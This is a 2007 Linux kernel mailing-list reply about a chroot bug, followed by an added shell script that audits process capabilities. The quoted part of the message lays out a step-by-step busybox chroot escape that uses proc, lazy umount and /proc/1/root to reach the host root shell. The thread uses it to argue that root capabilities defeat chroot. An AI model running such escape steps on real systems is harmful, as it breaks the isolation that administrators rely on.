From: Miloslav Semler <majkls@prepere.com>
To: Kyle Moffett <mrmacman_g4@mac.com>
Cc: David Newall <david@davidnewall.com>,
Adrian Bunk <bunk@kernel.org>,
Alan Cox <alan@lxorguk.ukuu.org.uk>,
"Serge E. Hallyn" <serge@hallyn.com>,
Bill Davidsen <davidsen@tmr.com>,
Philipp Marek <philipp@marek.priv.at>,
7eggert@gmx.de, bunk@fs.tum.de, linux-kernel@vger.kernel.org
Subject: Re: Chroot bug
Date: Wed, 26 Sep 2007 17:01:36 +0200
Message-ID: <46FA7450.5020707@prepere.com>
In-Reply-To: <73A0FA2C-7202-4E5C-9521-C2BC7026DE3B@mac.com>
>
> This is basically both painfully racy and easily broken with umount
> and/or access to proc. See this busybox-compatible example:
>
> ## Set up chroot
> mkdir /root1
> mount -o mode=0750 -t tmpfs tmpfs /root1
> cp -a /bin/busybox /root1/busybox
>
> ## Enter chroot
> chroot /root1 /busybox
>
> ## Mount proc
> /busybox mkdir /proc
> /busybox mount -t proc proc /proc
>
> ## Poke around root filesystem (this may be all you need)
> /busybox ls /proc/1/root/
>
> ## Detach our chroot so we're no longer a sub-directory
> /busybox umount -l /proc/1/root/root1
>
> ## Now we can easily chroot to the original root, since it isn't in our ".." path
> exec /busybox chroot /proc/1/root /bin/sh
>
>
> See how easy that is? Unless you stick the above parent-directory
> check (which is still racy against directories being moved around) for
> *EVERY* directory component of *EVERY* open/chdir-ish syscall, you are
> still going to be easily worked around through many different methods.
>
So there is no discussion about mount & others. I think, if you have
CAP_SYS_MOUNT/CAP_SYS_ADMIN, you need not solve chroot() and how to
break it.
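
A defender-side check for the point made above, as an added example that is not part of the original message: it reads a process's effective capability mask from `/proc/<pid>/status` and reports whether the process still holds CAP_SYS_ADMIN (which gates mount and umount) or CAP_SYS_CHROOT (which gates chroot itself). The function names and the sample status text are constructed for illustration.

```sh
#!/bin/sh
# Added example (not from the thread): report whether a process keeps the
# capabilities under which a chroot is no barrier.

# Bit numbers from <linux/capability.h>.
CAP_SYS_CHROOT=18   # required to call chroot(2)
CAP_SYS_ADMIN=21    # required for mount(2) and umount(2)

# has_cap HEXMASK BIT -> exit status 0 if BIT is set in HEXMASK
has_cap() {
    [ $(( (0x$1 >> $2) & 1 )) -eq 1 ]
}

# risky_caps STATUS_TEXT -> prints the risky capabilities found in CapEff
risky_caps() (
    hex=$(printf '%s\n' "$1" | awk '$1 == "CapEff:" { print $2 }')
    [ -n "$hex" ] || { echo "no CapEff line" >&2; exit 2; }
    out=""
    if has_cap "$hex" "$CAP_SYS_ADMIN"; then out="$out CAP_SYS_ADMIN"; fi
    if has_cap "$hex" "$CAP_SYS_CHROOT"; then out="$out CAP_SYS_CHROOT"; fi
    echo "${out# }"
)

# audit_pid PID -> one line with the pid, its root directory and risky caps.
# A root other than "/" means the process is chrooted.
audit_pid() (
    status=$(cat "/proc/$1/status") || exit 1
    root=$(readlink "/proc/$1/root" 2>/dev/null || echo "?")
    echo "pid=$1 root=$root risky_caps=[$(risky_caps "$status")]"
)

# Constructed sample inputs in /proc/<pid>/status format.
# Full root: every capability bit set.
SAMPLE_ROOT=$(printf 'Name:\tbusybox\nCapEff:\t000001ffffffffff\n')
# Chrooted daemon that dropped everything except CAP_NET_BIND_SERVICE (bit 10).
SAMPLE_DROPPED=$(printf 'Name:\thttpd\nCapEff:\t0000000000000400\n')

echo "full root     : [$(risky_caps "$SAMPLE_ROOT")]"
echo "dropped daemon: [$(risky_caps "$SAMPLE_DROPPED")]"
```

On a live system, `audit_pid <pid>` applies the same check to a running process; reading another user's `/proc/<pid>/root` needs sufficient privilege.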